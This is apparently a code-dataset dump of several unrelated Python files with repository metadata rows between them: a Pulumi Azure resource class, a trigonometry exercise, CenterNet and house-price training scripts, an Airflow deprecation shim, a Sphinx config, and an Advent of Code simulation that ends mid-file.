def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Key-value pairs of additional properties for the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class Gen1Environment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
data_retention_time: Optional[pulumi.Input[str]] = None,
environment_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
partition_key_properties: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TimeSeriesIdPropertyArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
storage_limit_exceeded_behavior: Optional[pulumi.Input[Union[str, 'StorageLimitExceededBehavior']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
An environment is a set of time-series data available for query, and is the top level Azure Time Series Insights resource. Gen1 environments have data retention limits.
API Version: 2020-05-15.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] data_retention_time: ISO8601 timespan specifying the minimum number of days the environment's events will be available for query.
:param pulumi.Input[str] environment_name: Name of the environment
:param pulumi.Input[str] kind: The kind of the environment.
Expected value is 'Gen1'.
:param pulumi.Input[str] location: The location of the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TimeSeriesIdPropertyArgs']]]] partition_key_properties: The list of event properties which will be used to partition data in the environment. Currently, only a single partition key property is supported.
:param pulumi.Input[str] resource_group_name: Name of an Azure Resource group.
:param pulumi.Input[pulumi.InputType['SkuArgs']] sku: The sku determines the type of environment, either Gen1 (S1 or S2) or Gen2 (L1). For Gen1 environments the sku determines the capacity of the environment, the ingress rate, and the billing rate.
:param pulumi.Input[Union[str, 'StorageLimitExceededBehavior']] storage_limit_exceeded_behavior: The behavior the Time Series Insights service should take when the environment's capacity has been exceeded. If "PauseIngress" is specified, new events will not be read from the event source. If "PurgeOldData" is specified, new events will continue to be read and old events will be deleted from the environment. The default behavior is PurgeOldData.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value pairs of additional properties for the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Gen1EnvironmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
An environment is a set of time-series data available for query, and is the top level Azure Time Series Insights resource. Gen1 environments have data retention limits.
API Version: 2020-05-15.
:param str resource_name: The name of the resource.
:param Gen1EnvironmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(Gen1EnvironmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
data_retention_time: Optional[pulumi.Input[str]] = None,
environment_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
partition_key_properties: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TimeSeriesIdPropertyArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
storage_limit_exceeded_behavior: Optional[pulumi.Input[Union[str, 'StorageLimitExceededBehavior']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = Gen1EnvironmentArgs.__new__(Gen1EnvironmentArgs)
if data_retention_time is None and not opts.urn:
raise TypeError("Missing required property 'data_retention_time'")
__props__.__dict__["data_retention_time"] = data_retention_time
__props__.__dict__["environment_name"] = environment_name
if kind is None and not opts.urn:
raise TypeError("Missing required property 'kind'")
__props__.__dict__["kind"] = 'Gen1'
__props__.__dict__["location"] = location
__props__.__dict__["partition_key_properties"] = partition_key_properties
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if sku is None and not opts.urn:
raise TypeError("Missing required property 'sku'")
__props__.__dict__["sku"] = sku
__props__.__dict__["storage_limit_exceeded_behavior"] = storage_limit_exceeded_behavior
__props__.__dict__["tags"] = tags
__props__.__dict__["creation_time"] = None
__props__.__dict__["data_access_fqdn"] = None
__props__.__dict__["data_access_id"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["status"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:timeseriesinsights:Gen1Environment"), pulumi.Alias(type_="azure-native:timeseriesinsights/v20170228preview:Gen1Environment"), pulumi.Alias(type_="azure-nextgen:timeseriesinsights/v20170228preview:Gen1Environment"), pulumi.Alias(type_="azure-native:timeseriesinsights/v20171115:Gen1Environment"), pulumi.Alias(type_="azure-nextgen:timeseriesinsights/v20171115:Gen1Environment"), pulumi.Alias(type_="azure-native:timeseriesinsights/v20180815preview:Gen1Environment"), pulumi.Alias(type_="azure-nextgen:timeseriesinsights/v20180815preview:Gen1Environment"), pulumi.Alias(type_="azure-native:timeseriesinsights/v20200515:Gen1Environment"), pulumi.Alias(type_="azure-nextgen:timeseriesinsights/v20200515:Gen1Environment"), pulumi.Alias(type_="azure-native:timeseriesinsights/v20210630preview:Gen1Environment"), pulumi.Alias(type_="azure-nextgen:timeseriesinsights/v20210630preview:Gen1Environment")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Gen1Environment, __self__).__init__(
'azure-native:timeseriesinsights:Gen1Environment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Gen1Environment':
"""
Get an existing Gen1Environment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = Gen1EnvironmentArgs.__new__(Gen1EnvironmentArgs)
__props__.__dict__["creation_time"] = None
__props__.__dict__["data_access_fqdn"] = None
__props__.__dict__["data_access_id"] = None
__props__.__dict__["data_retention_time"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["partition_key_properties"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["sku"] = None
__props__.__dict__["status"] = None
__props__.__dict__["storage_limit_exceeded_behavior"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
return Gen1Environment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> pulumi.Output[str]:
"""
The time the resource was created.
"""
return pulumi.get(self, "creation_time")
@property
@pulumi.getter(name="dataAccessFqdn")
def data_access_fqdn(self) -> pulumi.Output[str]:
"""
The fully qualified domain name used to access the environment data, e.g. to query the environment's events or upload reference data for the environment.
"""
return pulumi.get(self, "data_access_fqdn")
@property
@pulumi.getter(name="dataAccessId")
def data_access_id(self) -> pulumi.Output[str]:
"""
An id used to access the environment data, e.g. to query the environment's events or upload reference data for the environment.
"""
return pulumi.get(self, "data_access_id")
@property
@pulumi.getter(name="dataRetentionTime")
def data_retention_time(self) -> pulumi.Output[str]:
"""
ISO8601 timespan specifying the minimum number of days the environment's events will be available for query.
"""
return pulumi.get(self, "data_retention_time")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
The kind of the environment.
Expected value is 'Gen1'.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="partitionKeyProperties")
def partition_key_properties(self) -> pulumi.Output[Optional[Sequence['outputs.TimeSeriesIdPropertyResponse']]]:
"""
The list of event properties which will be used to partition data in the environment. Currently, only a single partition key property is supported.
"""
return pulumi.get(self, "partition_key_properties")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning state of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def sku(self) -> pulumi.Output['outputs.SkuResponse']:
"""
The sku determines the type of environment, either Gen1 (S1 or S2) or Gen2 (L1). For Gen1 environments the sku determines the capacity of the environment, the ingress rate, and the billing rate.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def status(self) -> pulumi.Output['outputs.EnvironmentStatusResponse']:
"""
An object that represents the status of the environment, and its internal state in the Time Series Insights service.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="storageLimitExceededBehavior")
def storage_limit_exceeded_behavior(self) -> pulumi.Output[Optional[str]]:
"""
The behavior the Time Series Insights service should take when the environment's capacity has been exceeded. If "PauseIngress" is specified, new events will not be read from the event source. If "PurgeOldData" is specified, new events will continue to be read and old events will be deleted from the environment. The default behavior is PurgeOldData.
"""
return pulumi.get(self, "storage_limit_exceeded_behavior")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
| 51.541568 | 982 | 0.679847 |
dabb5812a2d8bec18c2ad29749fe7e5856030bc9 | 391 | py | Python | Scripts2/Script18.py | jonfisik/ScriptsPython | 1d15221b3a41a06a189e3e04a5241fa63df9cf3f | [
"MIT"
] | 1 | 2020-09-05T22:25:36.000Z | 2020-09-05T22:25:36.000Z | Scripts2/Script18.py | jonfisik/ScriptsPython | 1d15221b3a41a06a189e3e04a5241fa63df9cf3f | [
"MIT"
] | null | null | null | Scripts2/Script18.py | jonfisik/ScriptsPython | 1d15221b3a41a06a189e3e04a5241fa63df9cf3f | [
"MIT"
] | null | null | null | '''Faça um programa que faça um ângulo qualquer e calcule o seno, coseno e a tangente'''
from math import sin
from math import cos
from math import tan
from math import pi
print('------'*5)
grau = int(input(' Qual o valor do ângulo? '))
rad = (grau*pi) / 180
x = sin(rad)
y = cos(rad)
z = tan(rad)
print(' seno - {:.2f}\n cosseno - {:.2f}\n tangente {:.2f}'.format(x,y,z))
print('------'*5) | 27.928571 | 88 | 0.636829 |
24a1aa75639d5c499ed169d6c258480a37185c96 | 3,639 | py | Python | src/train_backup.py | Wastoon/CenterNet-Multi-Func-Det | 3cc131d575a2d7bde5813786e048ac1008a5d711 | [
"MIT"
] | 1 | 2022-01-22T18:38:23.000Z | 2022-01-22T18:38:23.000Z | src/train_backup.py | Wastoon/CenterNet-Multi-Func-Det | 3cc131d575a2d7bde5813786e048ac1008a5d711 | [
"MIT"
] | null | null | null | src/train_backup.py | Wastoon/CenterNet-Multi-Func-Det | 3cc131d575a2d7bde5813786e048ac1008a5d711 | [
"MIT"
] | 1 | 2021-02-24T06:50:40.000Z | 2021-02-24T06:50:40.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import _init_paths
import os
import torch
import torch.utils.data
from opts import opts
from models.model import create_model, load_model, save_model
from models.data_parallel import DataParallel
from logger import Logger
from datasets.dataset_factory import get_dataset
from trains.train_factory import train_factory
def main(opt):
torch.manual_seed(opt.seed)
torch.backends.cudnn.benchmark = not opt.not_cuda_benchmark and not opt.test
Dataset = get_dataset(opt.dataset, opt.task)
opt = opts().update_dataset_info_and_set_heads(opt, Dataset)
print(opt)
logger = Logger(opt)
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpus_str
opt.device = torch.device('cuda' if opt.gpus[0] >= 0 else 'cpu')
print('Creating model...')
model = create_model(opt.arch, opt.heads, opt.head_conv)
optimizer = torch.optim.Adam(model.parameters(), opt.lr)
start_epoch = 0
if opt.load_model != '':
model, optimizer, start_epoch = load_model(
model, opt.load_model, optimizer, opt.resume, opt.lr, opt.lr_step)
Trainer = train_factory[opt.task]
trainer = Trainer(opt, model, optimizer)
trainer.set_device(opt.gpus, opt.chunk_sizes, opt.device)
print('Setting up data...')
val_loader = torch.utils.data.DataLoader(
Dataset(opt, 'val'),
batch_size=1,
shuffle=False,
num_workers=1,
pin_memory=True
)
if opt.test:
_, preds = trainer.val(0, val_loader)
val_loader.dataset.run_eval(preds, opt.save_dir)
return
train_loader = torch.utils.data.DataLoader(
Dataset(opt, 'train'),
batch_size=opt.batch_size,
shuffle=True,
num_workers=opt.num_workers,
pin_memory=True,
drop_last=True
)
print('Starting training...')
best = 1e10
for epoch in range(start_epoch + 1, opt.num_epochs + 1):
mark = epoch if opt.save_all else 'last'
log_dict_train, _ = trainer.train(epoch, train_loader)
logger.write_epoch('epoch: {} |'.format(epoch))
for k, v in log_dict_train.items():
logger.scalar_summary('train_{}'.format(k), v, epoch)
logger.write_epoch('{} {:8f} | '.format(k, v))
if opt.val_intervals > 0 and epoch % opt.val_intervals == 0:
save_model(os.path.join(opt.save_dir, 'model_{}.pth'.format(mark)),
epoch, model, optimizer)
with torch.no_grad():
log_dict_val, preds = trainer.val(epoch, val_loader)
for k, v in log_dict_val.items():
logger.scalar_summary('val_{}'.format(k), v, epoch)
logger.write_epoch('{} {:8f} | '.format(k, v))
if log_dict_val[opt.metric] < best:
best = log_dict_val[opt.metric]
save_model(os.path.join(opt.save_dir, 'model_best.pth'),
epoch, model)
else:
save_model(os.path.join(opt.save_dir, 'model_last.pth'),
epoch, model, optimizer)
logger.write_epoch('\n')
if epoch in opt.lr_step:
save_model(os.path.join(opt.save_dir, 'model_{}.pth'.format(epoch)),
epoch, model, optimizer)
lr = opt.lr * (0.1 ** (opt.lr_step.index(epoch) + 1))
print('Drop LR to', lr)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
logger.close_epoch()
if __name__ == '__main__':
opt = opts().parse()
main(opt) | 35.330097 | 80 | 0.625447 |
3536e52560749ad5eb510dbcb5c69bff04580784 | 1,272 | py | Python | airflow/contrib/sensors/gcs_sensor.py | kpathak13/airflow-1 | 02b478ef8a7e1c1f890e5eb89842333a53654a70 | [
"Apache-2.0"
] | 1 | 2019-10-02T13:33:48.000Z | 2019-10-02T13:33:48.000Z | airflow/contrib/sensors/gcs_sensor.py | kpathak13/airflow-1 | 02b478ef8a7e1c1f890e5eb89842333a53654a70 | [
"Apache-2.0"
] | null | null | null | airflow/contrib/sensors/gcs_sensor.py | kpathak13/airflow-1 | 02b478ef8a7e1c1f890e5eb89842333a53654a70 | [
"Apache-2.0"
] | 1 | 2019-11-26T21:53:20.000Z | 2019-11-26T21:53:20.000Z | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module is deprecated. Please use `airflow.gcp.sensors.gcs`."""
import warnings
# pylint: disable=unused-import
from airflow.gcp.sensors.gcs import ( # noqa
GoogleCloudStorageObjectSensor,
GoogleCloudStorageObjectUpdatedSensor,
GoogleCloudStoragePrefixSensor,
GoogleCloudStorageUploadSessionCompleteSensor
)
warnings.warn(
"This module is deprecated. Please use `airflow.gcp.sensors.gcs`.",
DeprecationWarning, stacklevel=2
)
| 36.342857 | 71 | 0.766509 |
e62e7de25b2bea64cac69995599543ee5b3e1788 | 6,696 | py | Python | exercises/house_price_prediction.py | assafine/IML.HUJI | b81b8beff05b5f120aa21a2f7fe90b4db95174f4 | [
"MIT"
] | null | null | null | exercises/house_price_prediction.py | assafine/IML.HUJI | b81b8beff05b5f120aa21a2f7fe90b4db95174f4 | [
"MIT"
] | null | null | null | exercises/house_price_prediction.py | assafine/IML.HUJI | b81b8beff05b5f120aa21a2f7fe90b4db95174f4 | [
"MIT"
] | null | null | null | from IMLearn.utils import split_train_test
from IMLearn.learners.regressors import LinearRegression
from IMLearn.metrics import loss_functions as ls
from typing import NoReturn
import numpy as np
import pandas as pd
import plotly.graph_objects as go
import plotly.express as px
import plotly.io as pio
pio.templates.default = "simple_white"
def load_data(filename: str):
"""
Load house prices dataset and preprocess data.
Parameters
----------
filename: str
Path to house prices dataset
Returns
-------
Design matrix and response vector (prices) - either as a single
DataFrame or a Tuple[DataFrame, Series]
"""
data = pd.read_csv(filename)
# Drop problematic values
data["date"] = pd.to_datetime(data["date"], errors='coerce')
data.dropna(inplace=True)
data.drop(data[(data["price"] <= 0) | (data["bedrooms"] > 20) | (
data["sqft_lot15"] <= 0) | (data["price"] <= 0) | (
data["bedrooms"] <= 0)].index,
inplace=True)
# Create new feature of time since last build pf house
data["time_since_built"] = data.apply(lambda row: delta_time(row), axis=1)
data.loc[data["time_since_built"] < 0, "time_since_built"] = 0
data["grade^6"] = data["grade"] ** 6
data["time_since_built^0.3"] = data["time_since_built"] ** 0.3
data["baths_by_beds"] = data["bathrooms"] / data["bedrooms"]
data["living_room_ratio2"] = data["sqft_living"] / data["sqft_lot"]
data["bed_times_baths_sqaured"] = data["bedrooms"] * data["bathrooms"] ** 2
data["condition_by_grade^5"] = data["condition"] * data["grade"] ** 5
# Catagorise zipcode
data = pd.concat([data, pd.get_dummies(data["zipcode"], prefix="zipcode")],
axis=1)
# Choose features based on Pearson Correlation:
X = data[['condition_by_grade^5', 'grade^6', 'sqft_living', 'grade',
'sqft_above', 'sqft_living15', 'bed_times_baths_sqaured',
'bathrooms',
'view', 'sqft_basement', 'bedrooms', 'lat', 'baths_by_beds',
'zipcode_98004.0', 'waterfront', 'floors', 'zipcode_98039.0',
'zipcode_98040.0', 'zipcode_98112.0', 'zipcode_98006.0',
'yr_renovated',
'living_room_ratio2', 'zipcode_98033.0', 'zipcode_98105.0',
'sqft_lot',
'zipcode_98075.0', 'zipcode_98199.0', 'sqft_lot15',
'zipcode_98002.0',
'zipcode_98168.0', 'zipcode_98001.0', 'zipcode_98042.0',
'time_since_built', 'zipcode_98023.0', 'time_since_built^0.3']]
y = data['price']
return (X, y)
def feature_evaluation(X: pd.DataFrame, y: pd.Series,
output_path: str = ".") -> NoReturn:
"""
Create scatter plot between each feature and the response.
- Plot title specifies feature name
- Plot title specifies Pearson Correlation between feature and response
- Plot saved under given folder with file name including feature name
Parameters
----------
X : DataFrame of shape (n_samples, n_features)
Design matrix of regression problem
y : array-like of shape (n_samples, )
Response vector to evaluate against
output_path: str (default ".")
Path to folder in which plots are saved
"""
for feature in X.columns:
x = X[feature]
pc = np.cov(x, y=y)[0][1] / (np.std(x) * np.std(y))
my_fig = go.Figure()
my_fig.add_trace(
go.Scatter(x=x, y=y, mode="markers"))
my_fig.update_layout(
title=f"{feature} to response, correlation: {pc}",
xaxis_title=f"{feature}",
yaxis_title="y",
font=dict(
size=12
))
my_fig.write_image(f"{output_path}/{feature}_scatter.jpeg")
def delta_time(row):
if row["yr_renovated"] == 0:
return row["date"].year - row["yr_built"]
return row["date"].year - row["yr_renovated"]
if __name__ == '__main__':
# Note: Running the code takes a while, uses a lot of features
np.random.seed(0)
# Question 1 - Load and preprocessing of housing prices dataset
filename = f"C:/Users/Assaf/Documents/University/Year 2 - Semester B/IML/" \
f"Git Environment/IML.HUJI/datasets/house_prices.csv"
X, y = load_data(filename)
# Question 2 - Feature evaluation with respect to response
dir_path = r"C:\Users\Assaf\Documents\University\Year 2 - Semester B\IML\Exercises" \
r"\Ex2\plots_houses"
feature_evaluation(X, y, dir_path)
# Question 3 - Split samples into training- and testing sets.
train_X, train_y, test_X, test_y = split_train_test(X, y)
# Question 4 - Fit model over increasing percentages of the overall training data
# For every percentage p in 10%, 11%, ..., 100%, repeat the following 10 times:
# 1) Sample p% of the overall training data
# 2) Fit linear model (including intercept) over sampled set
# 3) Test fitted model over test set
# 4) Store average and variance of loss over test set
# Then plot average loss as function of training size with error ribbon of size (mean-2*std, mean+2*std)
model = LinearRegression()
full_train_mat = pd.concat([train_X, train_y], axis=1)
loss_array = []
for p in range(10, 101):
loss_test_p = []
for _ in range(10):
sample = full_train_mat.sample(frac=p / 100)
sample_y = sample["price"].to_numpy()
sample_X = sample.drop(columns=["price"]).to_numpy()
model.fit(sample_X, sample_y)
predict_y = model.predict(test_X.to_numpy())
loss_test_p.append(ls.mean_square_error(test_y, predict_y))
loss_array.append([p, np.mean(loss_test_p), np.std(loss_test_p)])
loss_array = np.array(loss_array).T
my_fig = go.Figure()
my_fig.add_trace(
go.Scatter(x=loss_array[0, :], y=loss_array[1, :], mode="markers"))
my_fig.add_trace(
go.Scatter(x=loss_array[0, :],
y=loss_array[1, :] - 2 * loss_array[2, :],
fill=None, mode="lines", line=dict(color="lightgrey"),
showlegend=False))
my_fig.add_trace(
go.Scatter(x=loss_array[0, :],
y=loss_array[1, :] + 2 * loss_array[2, :],
fill='tonexty', mode="lines", line=dict(color="lightgrey"),
showlegend=False))
my_fig.update_layout(
title=f"Mean loss plot as function of sample size",
xaxis_title="Sample percent",
yaxis_title="MSE",
font=dict(
size=18
))
my_fig.show()
| 39.857143 | 108 | 0.613202 |
240bd4284947739df405aded1875eed14b946513 | 201 | py | Python | gluu_ecommerce/views.py | coseasonruby/Gluu-Ecommerce-djagno-project | d196309bbd76571ee7793bd3de4342eb81f789e1 | [
"MIT"
] | null | null | null | gluu_ecommerce/views.py | coseasonruby/Gluu-Ecommerce-djagno-project | d196309bbd76571ee7793bd3de4342eb81f789e1 | [
"MIT"
] | null | null | null | gluu_ecommerce/views.py | coseasonruby/Gluu-Ecommerce-djagno-project | d196309bbd76571ee7793bd3de4342eb81f789e1 | [
"MIT"
] | null | null | null | from django.shortcuts import render
def handle_500(request):
return render(request, '500.html', status=500)
def handle_404(request):
return render(request, '400.html', status=404)
| 20.1 | 51 | 0.701493 |
c8c9ef3088995290c8b1331788df4786e6875890 | 5,475 | py | Python | doc/conf.py | seirl/matrix-nio | e3be482b0558da52c62c53e435afc832d22e208c | [
"Apache-2.0"
] | null | null | null | doc/conf.py | seirl/matrix-nio | e3be482b0558da52c62c53e435afc832d22e208c | [
"Apache-2.0"
] | null | null | null | doc/conf.py | seirl/matrix-nio | e3be482b0558da52c62c53e435afc832d22e208c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
import sphinx
sys.path.insert(0, os.path.abspath('../'))
# -- Project information -----------------------------------------------------
project = 'nio'
copyright = '2020, Damir Jelić'
author = 'Damir Jelić'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = '0.18.3'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Mock out the Olm module since it can't be installed without the C lib.
autodoc_mock_imports = ["olm"]
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
'sphinx.ext.napoleon',
'm2r2',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = ['.rst', '.md']
# source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'niodoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'nio.tex', 'nio Documentation',
'Damir Jelić', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'nio', 'nio Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'nio', 'nio Documentation',
author, 'nio', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Extension configuration -------------------------------------------------
| 28.968254 | 79 | 0.645662 |
6fbc4aa579252278e292531e3d23bbc6862d327c | 5,591 | py | Python | 24-2.py | InCogNiTo124/AoC2018 | 846e625a2d51b7746fb636b0ad9ab5908ee6d056 | [
"BSD-2-Clause"
] | null | null | null | 24-2.py | InCogNiTo124/AoC2018 | 846e625a2d51b7746fb636b0ad9ab5908ee6d056 | [
"BSD-2-Clause"
] | null | null | null | 24-2.py | InCogNiTo124/AoC2018 | 846e625a2d51b7746fb636b0ad9ab5908ee6d056 | [
"BSD-2-Clause"
] | null | null | null | import copy
class Group:
def __init__(self, name, count, hit_points, immune_set, weak_set, dmg, atk_type, initiative):
self.name = name
self.unit_count = count
self.unit_hit_point = hit_points
self.immune_to = immune_set
self.weak_to = weak_set
self.atk_dmg = dmg
self.atk_type = atk_type
self.initiative = initiative
self.target = None
self.is_target = False
return
def calculate_effective_power(self):
return self.unit_count * self.atk_dmg
def calculate_dmg(self, group):
if group.immune_to is not None and self.atk_type in group.immune_to:
return 0
elif group.weak_to is not None and self.atk_type in group.weak_to:
return self.calculate_effective_power() * 2
else:
return self.calculate_effective_power()
def __repr__(self):
return "{} {} units".format(self.name, self.unit_count)
immune_system = [
# TEST
# Group("Imn1", 17, 5390, None, {'radiation', 'bludgeoning'}, 4507, 'fire', 2),
# Group("Imn2", 989, 1274, {'fire'}, {'bludgeoning', 'slashing'}, 25, 'slashing', 3),
Group("Imn1", 4592, 2061, {'slashing', 'radiation'}, {'cold'}, 4, 'fire', 9),
Group("Imn2", 1383, 3687, None, None, 26, 'radiation', 15),
Group("Imn3", 2736, 6429, {'slashing'}, None, 20, 'slashing', 2),
Group("Imn4", 777, 3708, {'radiation', 'cold'}, {'slashing', 'fire'}, 39, 'cold', 4),
Group("Imn5", 6761, 2792, {'bludgeoning', 'fire', 'cold', 'slashing'}, None, 3, 'radiation', 17),
Group("Imn6", 6028, 5537, {'slashing'}, None, 7, 'radiation', 6),
Group("Imn7", 2412, 2787, None, None, 9, 'bludgeoning', 20),
Group("Imn8", 6042, 7747, {'radiation'}, None, 12, 'slashing', 12),
Group("Imn9", 1734, 7697, None, {'radiation', 'cold'}, 38, 'cold', 10),
Group("Imn0", 4391, 3250, None, None, 7, 'cold', 19),
]
infection = [
# TEST
# Group("Inf1", 801, 4706, None, {'radiation'}, 116, 'bludgeoning', 1),
# Group("Inf2", 4485, 2961, {'radiation'}, {'fire', 'cold'}, 12, 'slashing', 4),
